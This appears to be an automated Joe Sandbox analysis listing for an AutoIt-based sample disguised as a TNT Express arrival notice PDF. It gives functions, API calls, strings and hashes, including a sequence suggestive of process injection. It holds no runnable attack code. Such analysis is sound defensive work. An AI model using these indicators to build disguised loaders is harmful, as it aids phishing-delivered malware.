Opcode Fuzzy Hash: 7ee8a76061d83c9f5e93714059d00282337306224ac303d8a44f65b4d423b447
Instruction Fuzzy Hash: 22F0283080038D73CB00B6AAD846D5E777DFE42314BA04931B924D66A2EFB0DA55CE82

Function 00933017 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?,00000001), ref: 0093302F
GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00933044

Strings

aut, xrefs: 00933038

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: Temp$FileNamePath
String ID: aut
API String ID: 3285503233-3010740371
Opcode ID: df9b76298602465d89bba68d39f4d9990def1a0b24b6d0270c0d9b5ccc53bac7
Instruction ID: cc32d4abd709b3563113c05289fe9835a80a294b76f8b458826ccd9ff7b61310
Opcode Fuzzy Hash: df9b76298602465d89bba68d39f4d9990def1a0b24b6d0270c0d9b5ccc53bac7
Instruction Fuzzy Hash: 52D0A7B25003287BDB30A7A5AC4EFCB3B6CDB04751F4002A1B665E60D5EAF0D984CBD0

Function 00947F59 Relevance: 4.9, APIs: 3, Instructions: 430COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 009482F5
TerminateProcess.KERNEL32(00000000), ref: 009482FC
FreeLibrary.KERNEL32(?,?,?,?), ref: 009484DD

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: Process$CurrentFreeLibraryTerminate
String ID:
API String ID: 146820519-0
Opcode ID: f86c44e8d9ea3de55dcefa15a202db810bcd6e8dcbc58342fba811175d922f90
Instruction ID: fa7c3ef727d81e0c25cd0f6500163a27752d7e97487340094f501f39c29533b4
Opcode Fuzzy Hash: f86c44e8d9ea3de55dcefa15a202db810bcd6e8dcbc58342fba811175d922f90
Instruction Fuzzy Hash: 1A125871A083419FC724DF28C484F6ABBE5FF89318F04895DE8998B252DB71E945CF92

Function 008F5AA9 Relevance: 4.7, APIs: 3, Instructions: 186COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c87ffa1a82d86164901fdf953735d5a92a7e54f9cb1e0d2d429c468a55c77c49
Instruction ID: f2d2041aef1bb0f2f3b27b5dfc4aa8ba0b64bd355f1cb7b98ebafd584b78b3f1
Opcode Fuzzy Hash: c87ffa1a82d86164901fdf953735d5a92a7e54f9cb1e0d2d429c468a55c77c49
Instruction Fuzzy Hash: 2D518E71900A0DAFCB119FB9C845ABE7BB8FF46324F14005AF705E7292D7759A019B62

Function 008F86AE Relevance: 4.6, APIs: 3, Instructions: 61COMMONLIBRARYCODE

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(00000000,00000000,?,?,008F85CC,?,00988CC8,0000000C), ref: 008F8704
GetLastError.KERNEL32(?,008F85CC,?,00988CC8,0000000C), ref: 008F870E
__dosmaperr.LIBCMT ref: 008F8739

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: ChangeCloseErrorFindLastNotification__dosmaperr
String ID:
API String ID: 490808831-0
Opcode ID: 2514e18b3f33a9f79e9697b190404e2adc2ec252025757c42dc4439a320a303d
Instruction ID: f408c5e3bd8e140a63ddb791415f1d4d1b4f29a7c6c7c4245c2e9f212ae1b6fc
Opcode Fuzzy Hash: 2514e18b3f33a9f79e9697b190404e2adc2ec252025757c42dc4439a320a303d
Instruction Fuzzy Hash: 67014833608A2C9AC724623C684D77F2B89EBA3779F290119FB14CB1D2DEB48C818251

Function 00932FD8 Relevance: 4.5, APIs: 3, Instructions: 27filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,00000000,?,?,00932CD4,?,?,?,00000004,00000001), ref: 00932FF2
SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00932CD4,?,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00933006
CloseHandle.KERNEL32(00000000,?,00932CD4,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0093300D

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: File$CloseCreateHandleTime
String ID:
API String ID: 3397143404-0
Opcode ID: 5828b38bb5a166d57c7d4da3c7e1203b45c73615ac9db6c12b0582c7dc618266
Instruction ID: f62957a8ca6700fcbda39447bed0bdf98930f089714b4b04d4bcb9bc670bc309
Opcode Fuzzy Hash: 5828b38bb5a166d57c7d4da3c7e1203b45c73615ac9db6c12b0582c7dc618266
Instruction Fuzzy Hash: 8BE0CD766947147BD2341766BC0DFCB3E1CD7C6F72F104210F719791D046B0250157A8

Function 008D1310 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 531COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 008D17F6

Strings

CALL, xrefs: 008D17C6

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: Init_thread_footer
String ID: CALL
API String ID: 1385522511-4196123274
Opcode ID: 9bc69452fce74198448afb791b644020e0a7f8261e4681188189422322651c73
Instruction ID: 9b0e83a757e5dc53f23ba0513323ccaf9fe92945e0fb2b6ebee7511c7be94d2b
Opcode Fuzzy Hash: 9bc69452fce74198448afb791b644020e0a7f8261e4681188189422322651c73
Instruction Fuzzy Hash: 30228B70608205AFCB14DF18D484A6ABBF2FF85314F148A6EF496CB362D735E885CB52

Function 00936EF1 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 297COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00936F6B

Part of subcall function 008C4ECB: LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,00991418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 008C4EFD

Strings

>>>AUTOIT SCRIPT<<<, xrefs: 00936F5A, 00936F63

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: LibraryLoad_wcslen
String ID: >>>AUTOIT SCRIPT<<<
API String ID: 3312870042-2806939583
Opcode ID: 6a42b1abfe109a24d942928c390d8f57cad11d51bb111bd7464b36de4671c096
Instruction ID: efe2f52db11a5058f49b1e7b3b126a8d0248ecfdcfbbee389a539b241a203a42
Opcode Fuzzy Hash: 6a42b1abfe109a24d942928c390d8f57cad11d51bb111bd7464b36de4671c096
Instruction Fuzzy Hash: C7B13C711082019FCB24EF68C491E6AB7F5FF94314F14896DF496972A2EB30ED49CB92

Function 008C2DE3 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 64COMMON

Download Yara Rule

APIs

GetOpenFileNameW.COMDLG32(?), ref: 00902C8C

Part of subcall function 008C3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,008C3A97,?,?,008C2E7F,?,?,?,00000000), ref: 008C3AC2

Part of subcall function 008C2DA5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 008C2DC4

Strings

X, xrefs: 00902C5A

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: Name$Path$FileFullLongOpen
String ID: X
API String ID: 779396738-3081909835
Opcode ID: ffae8e0264e37477b4583daf5eb8816cd9b8fdf1613683fba311a6aff5beb10e
Instruction ID: 377f713ded7cbcc61fc4d4517bf14a1151c922e601e5db26d59ab71b1094f872
Opcode Fuzzy Hash: ffae8e0264e37477b4583daf5eb8816cd9b8fdf1613683fba311a6aff5beb10e
Instruction Fuzzy Hash: DA219371A102589FDB01EF98C849BEE7BFCEF49314F008059E505FB281DBB49A898F61

Function 00932557 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 00932587

Strings

EA06, xrefs: 009325B9

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: __fread_nolock
String ID: EA06
API String ID: 2638373210-3962188686
Opcode ID: a36fb577f8094c2d39c2e263312fabde77b8c64253dbda401dde36f92ec94b17
Instruction ID: e42b7ebc117b6ee42f78cb7ff419d6c43ce3b5b128ac8b8d057228d27887986b
Opcode Fuzzy Hash: a36fb577f8094c2d39c2e263312fabde77b8c64253dbda401dde36f92ec94b17
Instruction Fuzzy Hash: 3201B5729042587EDF18D7ADC856EAEBBF8DB05305F00455AF152D6181E5B4E7088B61

Function 008C3837 Relevance: 3.1, APIs: 2, Instructions: 77windowCOMMON

Download Yara Rule

APIs

Shell_NotifyIconW.SHELL32(00000000,?), ref: 008C3908

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: IconNotifyShell_
String ID:
API String ID: 1144537725-0
Opcode ID: 7073b09010e9b928a8e85e8b7837cfaaa9d0196c95844674a775faf4dec23557
Instruction ID: 6a72e6512a9222ac7540950bd5a404d378d6594645718f7cd416e072cc334c00
Opcode Fuzzy Hash: 7073b09010e9b928a8e85e8b7837cfaaa9d0196c95844674a775faf4dec23557
Instruction Fuzzy Hash: 253171B05087019FD721DF28D885B97BBF8FB49708F00492EF59AD7250E771AA44DB52

Function 008CB710 Relevance: 2.1, APIs: 1, Instructions: 587COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 008CBB4E

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: Init_thread_footer
String ID:
API String ID: 1385522511-0
Opcode ID: 2e73d52c489ffaf7ba808f2a0db3b87671daa3375c29b2ff753a9ca5e8a053be
Instruction ID: 5f8d17a95ec19f2dd247e7a9a5268f54a724352ec6bd2eae120670b2f4bdaa8c
Opcode Fuzzy Hash: 2e73d52c489ffaf7ba808f2a0db3b87671daa3375c29b2ff753a9ca5e8a053be
Instruction Fuzzy Hash: 7E32CD30A04609AFDB24CF58C886FBEB7B9FF84314F14805AE915AB251D7B5ED81CB51

Function 008B129D Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 008B1A5B
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 008B1AF1
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 008B1B13

Memory Dump Source

Source File: 00000000.00000002.1371455675.00000000008B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8b0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: 7bc2eb71131a5ca0d961fb64b4ce1da28befc4a8e94ed8bda1bc50d134690387
Instruction ID: 0dd701690581f7536886b03ad733ce8d7023fee4edf22aff216ddeacb846064c
Opcode Fuzzy Hash: 7bc2eb71131a5ca0d961fb64b4ce1da28befc4a8e94ed8bda1bc50d134690387
Instruction Fuzzy Hash: E912DE24E24658C6EB24DF64D8507DEB232FF68300F1090E9910DEB7A5E77A5F81CB5A

Function 008C4ECB Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 008C4E90: LoadLibraryA.KERNEL32(kernel32.dll,?,?,008C4EDD,?,00991418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 008C4E9C
Part of subcall function 008C4E90: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 008C4EAE
Part of subcall function 008C4E90: FreeLibrary.KERNEL32(00000000,?,?,008C4EDD,?,00991418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 008C4EC0

LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,00991418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 008C4EFD

Part of subcall function 008C4E59: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00903CDE,?,00991418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 008C4E62
Part of subcall function 008C4E59: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 008C4E74
Part of subcall function 008C4E59: FreeLibrary.KERNEL32(00000000,?,?,00903CDE,?,00991418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 008C4E87

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: Library$Load$AddressFreeProc
String ID:
API String ID: 2632591731-0
Opcode ID: 6a0af623ddc77edfea73945732391a2362f0f9247a597291ef5198f6a25f2d94
Instruction ID: e0c77af545a85718038eec9ffdbf69ff27f848d62c89c8fae284844a936f742c
Opcode Fuzzy Hash: 6a0af623ddc77edfea73945732391a2362f0f9247a597291ef5198f6a25f2d94
Instruction Fuzzy Hash: 0911E332620305AADF14EB68DC22FAD77B5FF50711F10842EF542E61D1EEB0EA859B51

Function 008F8402 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

__wsopen_s.LIBCMT ref: 008F8440

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: __wsopen_s
String ID:
API String ID: 3347428461-0
Opcode ID: 1d7175d2c67098a351773a407542a853776f592a906d57365fa421dd86e3c5b2
Instruction ID: fc170a0ff85fffb2d4adda5f1981d2ba52903eb875f94eb90b36473c985d3609
Opcode Fuzzy Hash: 1d7175d2c67098a351773a407542a853776f592a906d57365fa421dd86e3c5b2
Instruction Fuzzy Hash: 4111067590410AEFCB05DF68E941AAA7BF9FF48314F144059F918EB312DA31DA118BA5

Function 008F5000 Relevance: 1.6, APIs: 1, Instructions: 52COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 008F4C7D: RtlAllocateHeap.NTDLL(00000008,008C1129,00000000,?,008F2E29,00000001,00000364,?,?,?,008EF2DE,008F3863,00991444,?,008DFDF5,?), ref: 008F4CBE

_free.LIBCMT ref: 008F506C

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: 9ba45ce058d1080761d5af908226540236078fd1fc19e2e0238d0ad147f07c6e
Instruction ID: eca208b32579ea4d61f006d67cfb439e18a94d1d0d900285b10e87089f3ad02f
Opcode Fuzzy Hash: 9ba45ce058d1080761d5af908226540236078fd1fc19e2e0238d0ad147f07c6e
Instruction Fuzzy Hash: 9D012B72204B095BE321CE799841A6AFBE8FBC5370F25051DE394C3280EA706805C674

Function 008EE602 Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
Instruction ID: 257aa9977881583c17a59f65857ea8df2f7c6939e3707767981bd09338e8560b
Opcode Fuzzy Hash: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
Instruction Fuzzy Hash: A8F0D132511A5896CB313A7F9C05B6A3798FF63334F100715FA21D22E2DB74D805C6A6

Function 008F4C7D Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,008C1129,00000000,?,008F2E29,00000001,00000364,?,?,?,008EF2DE,008F3863,00991444,?,008DFDF5,?), ref: 008F4CBE

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 1400dfa1560b9658165765fc821ce6532ae7dbe5f2d4b3cea5cf4e67eac99ce6
Instruction ID: 93191a1ab75d067ceeedb54b16701fd97758c11e6d1ddacb9cbfd56c1d67c03a
Opcode Fuzzy Hash: 1400dfa1560b9658165765fc821ce6532ae7dbe5f2d4b3cea5cf4e67eac99ce6
Instruction Fuzzy Hash: DCF0B43160626C67DB215F77AC05B7B3798FF417A1B147113BB19E7291CA71D80096A1

Function 008F3820 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,00991444,?,008DFDF5,?,?,008CA976,00000010,00991440,008C13FC,?,008C13C6,?,008C1129), ref: 008F3852

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 8a71a3b872dfe4d851e92d44c0e637c48b461356513b55d2c6494f77c1b52095
Instruction ID: d7cd719fd29ddafbf4a3b53cf923ddc11b6ea0d256ace99e5fed591acc92b84c
Opcode Fuzzy Hash: 8a71a3b872dfe4d851e92d44c0e637c48b461356513b55d2c6494f77c1b52095
Instruction Fuzzy Hash: 32E0E53112426DA7D621267B9D01BBA3648FB427F0F050031BF14D2691DB59DE0192E1

Function 008C4F39 Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,00991418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 008C4F6D

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
